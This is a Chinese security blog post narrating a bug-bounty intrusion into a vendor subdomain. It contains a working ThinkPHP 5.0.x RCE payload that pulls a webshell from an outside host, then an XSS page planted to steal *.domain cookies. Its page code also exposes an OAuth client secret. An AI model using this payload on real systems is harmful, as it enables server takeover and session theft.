<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="渗透测试,子域名劫持," />










<meta name="description" content="前言之前在先知社区和freebuf上看过关于子域名劫持的文章，一直觉得这种漏洞挺有意思， 但是总感觉很难撞到能利用的，后来有幸目睹了Art3mis师傅进行了一次风骚的子域名劫持，  让我看到了实时案例，于是希望着有一天我也能挖个这种洞。 正文子域名挖掘在挖某厂商的SRC时，我用了农夫安全的farmscan_domain对他进行了子域名挖掘， 发现了一个子域名为xxxxxx.x.com 访问他发现了">
<meta name="keywords" content="渗透测试,子域名劫持">
<meta property="og:type" content="article">
<meta property="og:title" content="一次成功的子域名劫持">
<meta property="og:url" content="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/index.html">
<meta property="og:site_name" content="Mugen">
<meta property="og:description" content="前言之前在先知社区和freebuf上看过关于子域名劫持的文章，一直觉得这种漏洞挺有意思， 但是总感觉很难撞到能利用的，后来有幸目睹了Art3mis师傅进行了一次风骚的子域名劫持，  让我看到了实时案例，于是希望着有一天我也能挖个这种洞。 正文子域名挖掘在挖某厂商的SRC时，我用了农夫安全的farmscan_domain对他进行了子域名挖掘， 发现了一个子域名为xxxxxx.x.com 访问他发现了">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/3.jpg">
<meta property="og:image" content="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/1.png">
<meta property="og:image" content="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/2.png">
<meta property="og:image" content="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/4.jpg">
<meta property="og:image" content="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/5.png">
<meta property="og:image" content="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/6.jpg">
<meta property="og:image" content="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/7.jpg">
<meta property="og:updated_time" content="2019-03-12T11:29:08.979Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="一次成功的子域名劫持">
<meta name="twitter:description" content="前言之前在先知社区和freebuf上看过关于子域名劫持的文章，一直觉得这种漏洞挺有意思， 但是总感觉很难撞到能利用的，后来有幸目睹了Art3mis师傅进行了一次风骚的子域名劫持，  让我看到了实时案例，于是希望着有一天我也能挖个这种洞。 正文子域名挖掘在挖某厂商的SRC时，我用了农夫安全的farmscan_domain对他进行了子域名挖掘， 发现了一个子域名为xxxxxx.x.com 访问他发现了">
<meta name="twitter:image" content="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/3.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/"/>





  <title>一次成功的子域名劫持 | Mugen</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Mugen</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">lego's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-links">
          <a href="/links" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />
            
            朋友
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="lego">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://raw.githubusercontent.com/legoc/legoc.github.io/master/about/index/baye.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Mugen">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">一次成功的子域名劫持</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-03-10T10:13:17+08:00">
                2019-03-10
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/SRC/" itemprop="url" rel="index">
                    <span itemprop="name">SRC</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 阅读次数
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>之前在先知社区和freebuf上看过关于子域名劫持的文章，一直觉得这种漏洞挺有意思，</p>
<p>但是总感觉很难撞到能利用的，后来有幸目睹了Art3mis师傅进行了一次风骚的子域名劫持，</p>
<p><img src="/2019/03/10/一次成功的子域名劫持/3.jpg" alt="2"></p>
<p>让我看到了实时案例，于是希望着有一天我也能挖个这种洞。</p>
<h1 id="正文"><a href="#正文" class="headerlink" title="正文"></a>正文</h1><h2 id="子域名挖掘"><a href="#子域名挖掘" class="headerlink" title="子域名挖掘"></a>子域名挖掘</h2><p>在挖某厂商的SRC时，我用了农夫安全的farmscan_domain对他进行了子域名挖掘，</p>
<p>发现了一个子域名为xxxxxx.x.com</p>
<p>访问他发现了<img src="/2019/03/10/一次成功的子域名劫持/1.png" alt="2"></p>
<p>然后我意识到了这里有搞头</p>
<h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>反解析ip 发现他是腾讯云下的服务器</p>
<p>用nmap扫描端口 发现他开放了22 80 888 8888端口</p>
<p>然后直接访问ip时 返回了一个json数据</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&quot;code&quot;:0,&quot;msg&quot;:&quot;欢迎访问&quot;,&quot;data&quot;:[]&#125;</span><br></pre></td></tr></table></figure>
<p>有个扫出一个后台ip/Admin/login/index.html 这里的验证码不会刷新可进行爆破 经过一番尝试爆破不出密码</p>
<p>访问888端口 回响403</p>
<p>访问8888端口</p>
<p><img src="/2019/03/10/一次成功的子域名劫持/2.png" alt="2"></p>
<p>我只能得到这些信息</p>
<p>这个腾讯云的服务器 用了宝塔面板 宝塔的后台地址我无法得知  有个可爆破的后台</p>
<p>在爆破了后台跟ssh无果之后我几乎放弃</p>
<p>然后我决定再对其进行一次目录爆破</p>
<h2 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h2><p>然后我突然想访问一下这个目录看看他会报什么错xxxx/%3f/</p>
<p>于是最大的转机来了，报错了，最重要的是发现了这个</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ThinkPHP V5.0.20 &#123; 十年磨一剑-为API开发设计的高性能框架 &#125;</span><br></pre></td></tr></table></figure>
<p>下意识就想到了thinkphp的漏洞，</p>
<p>虽然看过了水泡泡师傅和chybeta师傅在先知上关于这个漏洞的文章，</p>
<p>但是因为各种原因没有好好复现过这个漏洞在后面插payload的过程中踩了很多坑，</p>
<p>进过多次尝试，终于成功的getshell了</p>
<p>poc</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://xxxx/index.php?s=captcha&amp;lego=copy(&quot;http://xxx/lego.txt&quot;,&quot;test.php&quot;)</span><br><span class="line"></span><br><span class="line">_method=__construct&amp;filter=assert&amp;method=get&amp;server[REQUEST_METHOD]=lego</span><br></pre></td></tr></table></figure>
<p>蚁剑连上去</p>
<p><img src="/2019/03/10/一次成功的子域名劫持/4.jpg" alt="2"></p>
<p>发现了一个hydra.php的文件，发现被人种过马了，</p>
<p>顺手把这个马删了。</p>
<p>在拿下这个域名的webshell之后，我想对这种漏洞进行一个利用</p>
<p>在这子域名下</p>
<p>携带了一些  *.xxx.com的cookie</p>
<p>于是我便想着上传一个xss页面</p>
<h2 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h2><p>直接用域名访问xxxxx/test.php 返回404</p>
<p><img src="/2019/03/10/一次成功的子域名劫持/5.png" alt="2"></p>
<p>ip/test.php 会访问到我的一句话</p>
<p>只有在访问域名的时候浏览器才会携带cookie,用ip访问时浏览器不会携带cookie</p>
<p>意味着，我即使上传了带XSS的html页面，也无法访问到XSS页面。</p>
<p>但是我用域名:8888访问可以访问到宝塔那个页面</p>
<p>我起初想要修改那个页面来实现XSS</p>
<p>如果我们想要修改宝塔的话，就要访问<code>/www/server/panel/</code> 目录，</p>
<p>但是我的webshell是没有权限访问那个目录了，除非提权，</p>
<p>但是这又是一台腾讯云的服务器，应该不会出现可以提权的漏洞，</p>
<p>于是我陷入了沉思。。。。。</p>
<p>然后沉思久了我就去WC了，在WC的过程中，我用手机看了一下宝塔官网的用户手册 <a href="http://docs.bt.cn/424204" target="_blank" rel="noopener">http://docs.bt.cn/424204</a></p>
<p>在翻阅之后，我发现了一些有趣的东西，比如我们之前直接用域名访问，发现有那个没找到站点的页面，</p>
<p>其实这个是因为宝塔面板里面没有设置这个域名为解析的域名，所以会出现这种情况。</p>
<p>然后我们需要<code>/etc/init.d/bt default</code>才能查看宝塔的后台地址，我用蚁剑发现无法执行命令，估计是权限不够，</p>
<p>所以修改8888端口下的宝塔估计也是凉凉了</p>
<p>在继续翻阅宝塔的用户手册后，我发现了端口888运行了是phpmyadmin，然后我突然感觉到了我应该是可以完成这次利用了，</p>
<p>我找到了phpmyadmin的绝对路径</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">phpmyadmin_xxxxxxxxx</span><br></pre></td></tr></table></figure>
<p>我们之前直接访问888端口返回的是</p>
<p><img src="/2019/03/10/一次成功的子域名劫持/6.jpg" alt="2"></p>
<p>当我访问</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx.com/phpmyadmin_xxxxxxxxx/</span><br></pre></td></tr></table></figure>
<p>成功的跳转到了phpmyadmin的后台</p>
<p>在这个目录下新建一个html页面，访问 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">子域名:888/phpmyadmin_xxxxxxxxx/test.html</span><br></pre></td></tr></table></figure>
<p>成功弹出cookie</p>
<p><img src="/2019/03/10/一次成功的子域名劫持/7.jpg" alt="2"></p>
<p>至此，我的利用已经完成了。</p>
<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>这次渗透不得不说，有很多的运气成分，，主要时间在于信息收集上和学习新的事物上，</p>
<p>第一次挖子域名劫持，第一次认真利用thinkphp的RCE，和第一次真正的接触宝塔面板。</p>
<p>整个过程磕磕碰碰，但感觉收获了很多。</p>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    lego
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://legoc.github.io/2019/03/10/一次成功的子域名劫持/" title="一次成功的子域名劫持">https://legoc.github.io/2019/03/10/一次成功的子域名劫持/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/渗透测试/" rel="tag"># 渗透测试</a>
          
            <a href="/tags/子域名劫持/" rel="tag"># 子域名劫持</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/02/27/内网渗透学习/" rel="next" title="内网渗透学习">
                <i class="fa fa-chevron-left"></i> 内网渗透学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/22/渗透信息知小结/" rel="prev" title="渗透知识小结">
                渗透知识小结 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
 <div id="gitalk-container"></div>
 
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="https://raw.githubusercontent.com/legoc/legoc.github.io/master/about/index/baye.png"
                alt="lego" />
            
              <p class="site-author-name" itemprop="name">lego</p>
              <p class="site-description motion-element" itemprop="description">从小菜鸡往大菜鸡成长的路上...</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">33</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">54</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#前言"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#正文"><span class="nav-number">2.</span> <span class="nav-text">正文</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#子域名挖掘"><span class="nav-number">2.1.</span> <span class="nav-text">子域名挖掘</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#信息收集"><span class="nav-number">2.2.</span> <span class="nav-text">信息收集</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RCE"><span class="nav-number">2.3.</span> <span class="nav-text">RCE</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#利用"><span class="nav-number">2.4.</span> <span class="nav-text">利用</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#总结"><span class="nav-number">3.</span> <span class="nav-text">总结</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lego</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</div>




        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  

  
</div>








        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  <link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
  <script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
   <script type="text/javascript">
        var gitalk = new Gitalk({
          clientID: '76aae4c57ee7f811d638',
          clientSecret: 'd6d32a0bf34087bf9ee31a1a74fd5bd72cc23c92',
          repo: 'legoc.github.io',
          owner: 'legoc',
          admin: ['legoc'],
          id: decodeURI(window.location.pathname),
          distractionFreeMode: 'true'
        })
        gitalk.render('gitalk-container')           
       </script>
	   
	   
	   




  





  

  

  

  
  

  

  

  

</body>
</html>
